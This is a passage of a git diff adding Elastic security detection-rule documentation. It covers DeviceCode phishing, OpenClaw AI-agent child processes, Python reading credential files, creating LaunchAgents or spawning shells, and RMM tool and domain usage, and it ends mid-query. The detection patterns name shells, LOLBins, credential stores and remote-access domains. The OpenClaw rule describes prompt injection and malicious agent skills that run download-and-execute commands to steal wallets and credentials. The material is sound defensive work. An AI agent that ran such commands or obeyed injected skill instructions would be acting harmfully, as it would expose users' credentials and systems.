logging and anomaly detection for DeviceCode logins. +- If phishing is suspected, notify the affected user and provide security awareness training on how to recognize and report phishing attempts. +- Limit DeviceCode authentication to approved users and applications via conditional access policies. + + +==== Setup + + + +*Required Microsoft Entra ID Sign-In Logs* + +This rule requires the Azure integration with Microsoft Entra ID Sign-In logs to be enabled and configured to collect audit and activity logs via Azure Event Hub. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:(azure.activitylogs or azure.signinlogs) + and ( + azure.signinlogs.properties.authentication_protocol:deviceCode or + azure.signinlogs.properties.original_transfer_method:deviceCodeFlow or + azure.activitylogs.properties.authentication_protocol:deviceCode + ) + and event.outcome:success + and azure.signinlogs.properties.user_type:* + and not azure.signinlogs.properties.app_id:( + "29d9ed98-a469-4536-ade2-f981bc1d605e" or + "d5a56ea4-7369-46b8-a538-c370805301bf" or + "80faf920-1908-4b52-b5ef-a8e7bedfc67a" or + "97877f11-0fc6-4aee-b1ff-febb0519dd00" or + "245e1dee-74ef-4257-a8c8-8208296e1dfd" or + "9ba1a5c7-f17a-4de9-a1f1-6178c8d51223" or + "74bcdadc-2fdc-4bb3-8459-76d06952a0e9" or + "4813382a-8fa7-425e-ab75-3b753aab3abb" or + "a850aaae-d5a5-4e82-877c-ce54ff916282" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-execution-via-openclaw-agent.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-execution-via-openclaw-agent.asciidoc new file mode 100644 index 0000000000..d79146db2c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-execution-via-openclaw-agent.asciidoc @@ -0,0 +1,133 @@ +[[prebuilt-rule-8-19-18-execution-via-openclaw-agent]] +=== Execution via OpenClaw Agent + +Detects suspicious child process execution from the OpenClaw, Moltbot, or Clawdbot AI coding agents running via Node.js. These tools can execute arbitrary shell commands through skills or prompt injection attacks. Malicious skills from public registries like ClawHub have been observed executing obfuscated download-and-execute commands targeting cryptocurrency wallets and credentials. This rule identifies shells, scripting interpreters, and common LOLBins spawned by these AI agents. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.malwarebytes.com/blog/threat-intel/2026/01/clawdbots-rename-to-moltbot-sparks-impersonation-campaign +* https://www.tomshardware.com/tech-industry/cyber-security/malicious-moltbot-skill-targets-crypto-users-on-clawhub +* https://blogs.cisco.com/ai/personal-ai-agents-like-openclaw-are-a-security-nightmare +* https://blog.virustotal.com/2026/02/from-automation-to-infection-how.html + +*Tags*: + +* Domain: Endpoint +* Domain: LLM +* OS: Linux +* OS: macOS +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Command and Control +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Execution via OpenClaw Agent* + + +OpenClaw (formerly Clawdbot, rebranded to Moltbot) is a personal AI coding assistant that can execute shell commands +and scripts on behalf of users. Malicious actors have weaponized the skill ecosystem (ClawHub) to distribute skills +that execute download-and-execute commands, targeting cryptocurrency wallets and credentials. + + +*Possible investigation steps* + + +- Verify if OpenClaw/Moltbot is an approved application in your organization. +- Review the child process command line for indicators of malicious activity (encoded payloads, remote downloads, credential access). +- Check the parent Node.js process command line to identify which OpenClaw component initiated the execution. +- Examine recently installed skills from ClawHub for malicious or obfuscated code. +- Correlate with network events to identify data exfiltration or C2 communication. +- Review the user's AI conversation history for prompt injection attempts. + + +*False positive analysis* + + +- Developers legitimately using OpenClaw/Moltbot for AI-assisted coding may trigger this rule when the AI executes build scripts, curl commands, or other legitimate automation. +- If the tool is approved, consider tuning based on specific command patterns or adding exception lists. + + +*Response and remediation* + + +- If the child process activity appears malicious, terminate the OpenClaw gateway and investigate the skill that initiated the command. +- Review and remove any suspicious skills from the OpenClaw configuration. +- If credentials may have been accessed, rotate affected secrets and API keys. +- Block known typosquat domains (moltbot.you, clawbot.ai, clawdbot.you) at the network level. + + +==== Rule query + + +[source, js] +---------------------------------- +process where event.type == "start" and + process.parent.name : ("node", "node.exe") and + process.parent.command_line : ("*openclaw*", "*moltbot*", "*clawdbot*") and + process.name : ("bash", "sh", "zsh", "bash.exe", "cmd.exe", "powershell.exe", "curl.exe", "curl", "base64", "xattr", "osascript", "python*", "chmod", "certutil.exe", "rundll32.exe") and + not process.command_line in ("/bin/sh -c ip neigh show", "/usr/bin/sh -c ip neigh show", + "/bin/sh -c arp -a -n -l", "/usr/bin/sh -c arp -a -n -l") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: JavaScript +** ID: T1059.007 +** Reference URL: https://attack.mitre.org/techniques/T1059/007/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Sub-technique: +** Name: Web Protocols +** ID: T1071.001 +** Reference URL: https://attack.mitre.org/techniques/T1071/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-python-accessed-sensitive-credential-files.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-python-accessed-sensitive-credential-files.asciidoc new file mode 100644 index 0000000000..86cb435e17 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-python-accessed-sensitive-credential-files.asciidoc @@ -0,0 +1,114 @@ +[[prebuilt-rule-8-19-18-first-time-python-accessed-sensitive-credential-files]] +=== First Time Python Accessed Sensitive Credential Files + +Detects the first time a Python process accesses sensitive credential files on a given host. This behavior may indicate post-exploitation credential theft via a malicious Python script, compromised dependency, or malicious model file deserialization. Legitimate Python processes do not typically access credential files such as SSH keys, AWS credentials, browser cookies, Kerberos tickets, or keychain databases, so a first occurrence is a strong indicator of compromise. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.file-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/ +* https://github.com/trailofbits/fickling + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* Use Case: Threat Detection +* Tactic: Credential Access +* Data Source: Elastic Defend +* Resources: Investigation Guide +* Domain: LLM + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating First Time Python Accessed Sensitive Credential Files* + + +Attackers who achieve Python code execution — whether through malicious scripts, compromised dependencies, or model file deserialization (e.g., pickle/PyTorch `__reduce__`) — often target sensitive credential files such as SSH keys, cloud provider credentials, browser session cookies, and macOS keychain data. Since legitimate Python processes do not typically access these files, a first occurrence from a Python process is highly suspicious. + +This rule leverages the Elastic Defend sensitive file `open` event, which is only collected for known sensitive file paths, combined with the New Terms rule type to alert on the first time a specific credential file is accessed by Python on a given host within a 7-day window. + + +*Possible investigation steps* + + +- Examine the Python process command line and arguments to identify the script or command that triggered the file access. +- Determine if the Python process was loading a model file (look for `torch.load`, `pickle.load`), running a standalone script, or executing via a compromised dependency. +- Review the specific credential file that was accessed and assess the potential impact (SSH keys enable lateral movement, AWS credentials enable cloud access, browser cookies enable session hijacking). +- Check for outbound network connections from the same process tree that may indicate credential exfiltration. +- Investigate the origin of any recently downloaded scripts, packages, or model files on the host. +- Look for file creation events in `/tmp/` or other staging directories that may contain copies of the stolen credentials. + + +*False positive analysis* + + +- Python-based secret management tools (e.g., `aws-cli`, `gcloud`) legitimately access credential files. Consider excluding known trusted executables by process path. +- SSH automation scripts using `paramiko` or `fabric` may read SSH keys. Evaluate whether the access pattern matches known automation workflows. +- Security scanning tools running Python may enumerate credential files as part of their assessment. + + +*Response and remediation* + + +- Immediately rotate any credentials that were potentially accessed (SSH keys, AWS access keys, cloud tokens). +- Quarantine the Python process and investigate the source script, package, or model file that triggered the access. +- If a malicious file is confirmed, identify all hosts where it may have been distributed. +- Review outbound network connections from the host around the time of the credential access to check for exfiltration. +- Consider implementing `weights_only=True` enforcement for PyTorch model loading across the environment. + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:file and host.os.type:macos and event.action:open and +process.name:python* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Credentials from Password Stores +** ID: T1555 +** Reference URL: https://attack.mitre.org/techniques/T1555/ +* Sub-technique: +** Name: Keychain +** ID: T1555.001 +** Reference URL: https://attack.mitre.org/techniques/T1555/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-python-created-a-launchagent-or-launchdaemon.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-python-created-a-launchagent-or-launchdaemon.asciidoc new file mode 100644 index 0000000000..d4d9eb687b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-python-created-a-launchagent-or-launchdaemon.asciidoc @@ -0,0 +1,114 @@ +[[prebuilt-rule-8-19-18-first-time-python-created-a-launchagent-or-launchdaemon]] +=== First Time Python Created a LaunchAgent or LaunchDaemon + +Detects the first time a Python process creates or modifies a LaunchAgent or LaunchDaemon plist file on a given host. Malicious Python scripts, compromised dependencies, or model file deserialization can establish persistence on macOS by writing plist files to LaunchAgent or LaunchDaemon directories. Legitimate Python processes do not typically create persistence mechanisms, so a first occurrence is a strong indicator of compromise. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.persistence-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/ +* https://github.com/trailofbits/fickling + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Defend +* Resources: Investigation Guide +* Domain: LLM + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating First Time Python Created a LaunchAgent or LaunchDaemon* + + +macOS LaunchAgents and LaunchDaemons are plist files that configure programs to run automatically at login or boot. Attackers who achieve Python code execution — whether through malicious scripts, compromised dependencies, or model file deserialization (e.g., pickle/PyTorch `__reduce__`) — can drop plist files to establish persistence on the compromised host. This ensures their payload survives reboots and user logouts. + +This rule uses the Elastic Defend persistence event type (`event.action:"launch_daemon"`), which captures plist metadata including the program arguments, run-at-load configuration, and keep-alive settings. The New Terms rule type alerts on the first time a Python process creates a LaunchAgent or LaunchDaemon on a given host within a 7-day window. + + +*Possible investigation steps* + + +- Review the persistence event fields (`Persistence.runatload`, `Persistence.keepalive`, `Persistence.args`, `Persistence.path`) to understand the plist configuration. +- Examine the program path and arguments specified in the plist to determine if they reference a known legitimate application or a suspicious binary. +- Determine if the Python process was loading a model file (look for `torch.load`, `pickle.load`), running a standalone script, or executing via a compromised dependency. +- Verify if the target binary referenced in the plist exists on disk and whether it is signed or trusted. +- Investigate the origin of any recently downloaded scripts, packages, or model files on the host. +- Check for other persistence mechanisms that may have been established around the same time. + + +*False positive analysis* + + +- Some Python-based system management tools (e.g., Ansible, SaltStack) may legitimately create LaunchAgent or LaunchDaemon plist files. Evaluate whether the activity matches a known automation workflow. +- Python-based application installers may create plist files during setup. Check if the activity correlates with a known software installation. + + +*Response and remediation* + + +- Immediately unload the suspicious LaunchAgent or LaunchDaemon using `launchctl unload` with the plist path. +- Remove the suspicious plist file and any associated binary it references. +- Kill any processes launched by the plist file. +- Investigate and quarantine the Python script, package, or model file that created the persistence mechanism. +- Scan the host for additional indicators of compromise. +- If a malicious file is confirmed, identify all hosts where it may have been distributed. + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:macos and event.action:"launch_daemon" and +process.name:python* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Launch Agent +** ID: T1543.001 +** Reference URL: https://attack.mitre.org/techniques/T1543/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-python-spawned-a-shell-on-host.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-python-spawned-a-shell-on-host.asciidoc new file mode 100644 index 0000000000..ee9f952e19 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-python-spawned-a-shell-on-host.asciidoc @@ -0,0 +1,117 @@ +[[prebuilt-rule-8-19-18-first-time-python-spawned-a-shell-on-host]] +=== First Time Python Spawned a Shell on Host + +Detects the first time a Python process spawns a shell on a given host. Malicious Python scripts, compromised dependencies, or model file deserialization can result in shell spawns that would not occur during normal workflows. Since legitimate Python processes rarely shell out to interactive shells, a first occurrence of this behavior on a host is a strong signal of potential compromise. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.process-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/ +* https://github.com/trailofbits/fickling +* https://5stars217.github.io/2024-03-04-what-enables-malicious-models/ + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend +* Resources: Investigation Guide +* Domain: LLM + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating First Time Python Spawned a Shell on Host* + + +Attackers who achieve Python code execution — whether through malicious scripts, compromised dependencies, or model file deserialization (e.g., pickle/PyTorch `__reduce__`) — often spawn shell processes to perform reconnaissance, credential theft, persistence, or reverse shell activity. Since legitimate Python workflows rarely shell out with `-c`, a first occurrence is highly suspicious. + +This rule uses the New Terms rule type to detect the first occurrence of a Python process spawning a shell with the `-c` flag on a given host within a 7-day window. This approach reduces false positives from recurring legitimate Python workflows while surfacing novel, potentially malicious activity. + + +*Possible investigation steps* + + +- Examine the parent Python process command line to identify the script or command that triggered the shell spawn. +- Determine if the Python process was loading a model file (look for `torch.load`, `pickle.load`), running a standalone script, or executing via a compromised dependency. +- Review the shell command arguments to assess intent (credential access, reverse shell, persistence, reconnaissance). +- Inspect the full process tree to determine if the Python process was launched from an interactive session, a cron job, or an automated pipeline. +- Investigate the origin of any recently downloaded scripts, packages, or model files on the host. +- Correlate with other hosts in the environment to determine if the same behavior is occurring elsewhere, which may indicate a supply chain compromise. + + +*False positive analysis* + + +- Development environments where Python scripts legitimately shell out for system tasks (e.g., build scripts, CI/CD runners) may trigger this rule on first occurrence. Consider excluding known CI/CD working directories or build automation paths. +- Package installation via pip or conda may spawn shells during post-install scripts. These are excluded by the query filter. +- Jupyter notebooks executing system commands via `!` or `subprocess` may trigger this rule in data science environments. + + +*Response and remediation* + + +- Investigate the shell command that was executed and assess its impact (credential access, persistence, data exfiltration). +- If a malicious file is confirmed, quarantine it and identify its source (PyPI, Hugging Face, shared drive, email attachment). +- Scan other hosts that may have received the same file. +- Review and rotate any credentials that may have been accessed. +- Consider implementing `weights_only=True` enforcement for PyTorch model loading across the environment. + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:macos and event.type:start and event.action:exec and +process.parent.name:python* and +process.name:(bash or dash or sh or tcsh or csh or zsh or ksh or fish) and process.args:"-c" and +not process.command_line:(*pip* or *conda* or *brew* or *jupyter*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Python +** ID: T1059.006 +** Reference URL: https://attack.mitre.org/techniques/T1059/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-seen-dns-query-to-rmm-domain.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-seen-dns-query-to-rmm-domain.asciidoc new file mode 100644 index 0000000000..fed6066e38 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-seen-dns-query-to-rmm-domain.asciidoc @@ -0,0 +1,219 @@ +[[prebuilt-rule-8-19-18-first-time-seen-dns-query-to-rmm-domain]] +=== First Time Seen DNS Query to RMM Domain + +Detects DNS queries to commonly abused remote monitoring and management (RMM) or remote access software domains from processes that are not browsers. Intended to surface RMM clients, scripts, or other non-browser activity contacting these services. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-7205m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1219/002/ +* https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-025a + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Resources: Investigation Guide +* Data Source: Elastic Defend +* Data Source: Sysmon + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating First Time Seen DNS Query to RMM Domain* + + +This rule flags DNS queries to commonly abused RMM or remote access domains when the requesting process is not a browser. Legitimate RMM and remote desktop software is frequently abused for C2, persistence, and lateral movement. + + +*Possible investigation steps* + + +- Identify the process process.executable that performed the DNS query and verify if it is an approved RMM or remote access tool. +- Review the full process tree and parent process to understand how the binary was launched. +- Check process.code_signature for trusted RMM publishers; unsigned or unexpected signers may indicate abuse or trojanized installers. +- Correlate with the companion rule "First Time Seen Remote Monitoring and Management Tool" for the same host to see if the RMM process was first-time seen. +- Investigate other alerts for the same host or user in the past 48 hours. + + +*False positive analysis* + + +- Approved RMM or remote support tools used by IT will trigger this rule; consider allowlisting by process path or code signer for known managed tools. +- Some updaters or installers (e.g. signed by the RMM vendor) may resolve these domains; combine with process name or parent context to reduce noise. + + +*Response and remediation* + + +- If unauthorized RMM use is confirmed: isolate the host, remove the RMM software, rotate credentials, and block the domains at DNS/firewall where policy permits. +- Enforce policy that only approved RMM tools from approved publishers may be used, and only by authorized staff. + + +==== Rule query + + +[source, js] +---------------------------------- +FROM logs-endpoint.events.network-*, logs-windows.sysmon_operational-* METADATA _index +| WHERE host.os.type == "windows" + AND event.category == "network" + AND event.action in ("lookup_requested", "DNSEvent (DNS query)") + AND dns.question.name IS NOT NULL + +// Exclude browser processes +| WHERE NOT + process.name IN ( + "chrome.exe", "msedge.exe", "MicrosoftEdge.exe", "MicrosoftEdgeCP.exe", + "firefox.exe", "iexplore.exe", "safari.exe", "brave.exe", + "opera.exe", "vivaldi.exe", "msedgewebview2.exe" + ) + +// Extract the parent domain (last two labels, e.g. example.com) +| GROK dns.question.name """(?:[^.]+\.)+(?[^.]+\.[^.]+)$""" +| EVAL parent_domain = COALESCE(parent_domain, dns.question.name) + +// Known RMM parent domains, add or remove entries here as your environment changes. +| WHERE parent_domain IN ( + "teamviewer.com", + "logmein.com", + "logmeinrescue.com", + "logmeininc.com", + "internapcdn.net", + "anydesk.com", + "screenconnect.com", + "connectwise.com", + "splashtop.com", + "zohoassist.com", + "dwservice.net", + "gotoassist.com", + "getgo.com", + "logmeinrescue.com", + "rustdesk.com", + "remoteutilities.com", + "atera.com", + "ammyy.com", + "n-able.com", + "kaseya.net", + "bomgar.com", + "beyondtrustcloud.com", + "parsec.app", + "parsecusercontent.com", + "tailscale.com", + "twingate.com", + "jumpcloud.com", + "vnc.com", + "remotepc.com", + "netsupportsoftware.com", + "getscreen.me", + "beanywhere.com", + "swi-rc.com", + "swi-tc.com", + "qetqo.com", + "tmate.io", + "playanext.com", + "supremocontrol.com", + "itarian.com", + "datto.com", + "auvik.com", + "syncromsp.com", + "pulseway.com", + "immy.bot", + "immybot.com", + "level.io", + "ninjarmm.com", + "ninjaone.com", + "centrastage.net", + "datto.net", + "liongard.com", + "naverisk.com", + "panorama9.com", + "superops.ai", + "superops.com", + "tacticalrmm.com", + "meshcentral.com", + "remotly.com", + "fixme.it", + "islonline.com", + "zoho.eu", + "goverlan.com", + "iperius.net", + "iperiusremote.com", + "remotix.com", + "mikogo.com", + "r-hud.net", + "pcvisit.de", + "netviewer.com", + "helpwire.app", + "remotetopc.com", + "rport.io", + "action1.com", + "tiflux.com", + "gotoresolve.com" +) + +// Aggregate by parent domain and get 1st time seen timestamp as well as unique count of agents +| STATS + event_count = COUNT(*), + Esql.first_time_seen = MIN(@timestamp), + Esql.count_distinct_host_id = COUNT_DISTINCT(host.id), + Esql.process_executable_values = VALUES(process.executable), + Esql.dns_question_name_values = VALUES(dns.question.name), + Esql.host_name_values = VALUES(host.name) BY parent_domain + +// Calculate the time difference between first time seen and rule execution time +| eval Esql.recent = DATE_DIFF("minute", Esql.first_time_seen, now()) + +// First time seen is within 6m of the rule execution time and first seen in the last 5 days as per the rule from schedule and limited to 1 unique host +| where Esql.recent <= 6 and Esql.count_distinct_host_id == 1 + +// populate fields for rule exception +| eval host.name = MV_FIRST(Esql.host_name_values), + process.executable = MV_FIRST(Esql.process_executable_values), dns.question.name = MV_FIRST(Esql.dns_question_name_values) +| keep host.name, process.executable, dns.question.name, Esql.* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Remote Access Tools +** ID: T1219 +** Reference URL: https://attack.mitre.org/techniques/T1219/ +* Sub-technique: +** Name: Remote Desktop Software +** ID: T1219.002 +** Reference URL: https://attack.mitre.org/techniques/T1219/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-seen-remote-monitoring-and-management-tool.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-seen-remote-monitoring-and-management-tool.asciidoc new file mode 100644 index 0000000000..6edaa169cd --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-seen-remote-monitoring-and-management-tool.asciidoc @@ -0,0 +1,540 @@ +[[prebuilt-rule-8-19-18-first-time-seen-remote-monitoring-and-management-tool]] +=== First Time Seen Remote Monitoring and Management Tool + +Adversaries may install legitimate remote monitoring and management (RMM) tools or remote access software on compromised endpoints for command-and-control (C2), persistence, and execution of native commands. This rule detects when a process is started whose name or code signature (or whose parent's name or code signature) resembles commonly abused RMM/remote access tools, including first-time-seen child processes of such tools. New Terms type: host has not seen this process (or child-of-RMM pattern) before within the configured history window. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.process-* +* endgame-* +* winlogbeat-* +* logs-windows.forwarded* +* logs-windows.sysmon_operational-* +* logs-system.security* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/ +* https://attack.mitre.org/techniques/T1219/002/ +* https://github.com/redcanaryco/surveyor/blob/master/definitions/remote-admin.json +* https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-025a +* https://www.cisa.gov/sites/default/files/2025-06/aa25-163a-ransomware-simplehelp-rmm-compromise.pdf + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Resources: Investigation Guide +* Data Source: Elastic Defend +* Data Source: Elastic Endgame +* Data Source: Windows Security Event Logs +* Data Source: Sysmon + +*Version*: 116 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating First Time Seen Remote Monitoring and Management Tool* + + +Remote monitoring and management (RMM) and remote access software are commonly used by IT departments to provide support and manage endpoints. Attackers adopt the same tools to connect into interactive sessions, maintain access as a persistence mechanism, and drop malicious software. + +This rule detects when an RMM or remote access process is seen on a host for the first time within the new_terms history window (see rule.new_terms), enabling analysts to investigate and enforce the correct usage of such tools. + + +*Possible investigation steps* + + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Check if the execution of the RMM or remote access tool is approved by the organization's IT department. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Contact the account owner and confirm whether they are aware of this activity. + - If the tool is not approved for use in the organization, the employee could have been tricked into installing it and providing access to a malicious third party. Investigate whether this third party could be attempting to scam the end-user or gain access to the environment through social engineering. +- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes. + + +*False positive analysis* + + +- If an authorized support person or administrator used the tool to conduct legitimate support or remote access, consider reinforcing that only tooling approved by the IT policy should be used. The analyst can dismiss the alert if no other suspicious behavior is observed involving the host or users. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- If an unauthorized third party did the access via social engineering, consider improvements to the security awareness program. +- Enforce that only tooling approved by the IT policy should be used for remote access purposes and only by authorized staff. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Setup + + + +*Setup* + + +- **New terms window**: The rule uses `new_terms_fields: host.id` with a 7-day history window. The first time a matching RMM/remote access process is seen on a host within that window will trigger the alert. +- **Velociraptor**: If your organization deploys Velociraptor for DFIR or hunting, consider adding a rule exception by host group or excluding `process.name: "Velociraptor.exe"` where appropriate. +- **Elastic Defend**: For best coverage ensure process events with `process.code_signature` and `process.name` are ingested from Windows endpoints (e.g. logs-endpoint.events.process-*). +- **Parent matching**: The rule also matches when the started process's parent has an RMM/remote access name or code signer, so first-time child processes (e.g. scripts or binaries spawned by TeamViewer, ScreenConnect, AteraAgent, MeshAgent) are detected. Complement with DNS-based detection (e.g. Sigma rule for remote access software domains from non-browser processes) for full coverage. + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type: "windows" and + + event.category: "process" and event.type: "start" and + + ( + process.code_signature.subject_name : ( + "Action1 Corporation" or + "AeroAdmin LLC" or + "Ammyy LLC" or + "Atera Networks Ltd" or + "AWERAY PTE. LTD." or + "BeamYourScreen GmbH" or + "Bomgar Corporation" or + "DUC FABULOUS CO.,LTD" or + "DOMOTZ INC." or + "DWSNET OÜ" or + "FleetDeck Inc" or + "GlavSoft LLC" or + "GlavSoft LLC." or + "Hefei Pingbo Network Technology Co. Ltd" or + "IDrive, Inc." or + "IMPERO SOLUTIONS LIMITED" or + "Instant Housecall" or + "ISL Online Ltd." or + "LogMeIn, Inc." or + "Monitoring Client" or + "MMSOFT Design Ltd." or + "Nanosystems S.r.l." or + "NetSupport Ltd" or + "NetSupport Ltd." or + "NETSUPPORT LTD." or + "NinjaRMM, LLC" or + "Parallels International GmbH" or + "philandro Software GmbH" or + "Pro Softnet Corporation" or + "RealVNC" or + "RealVNC Limited" or + "BreakingSecurity.net" or + "Remote Utilities LLC" or + "Rocket Software, Inc." or + 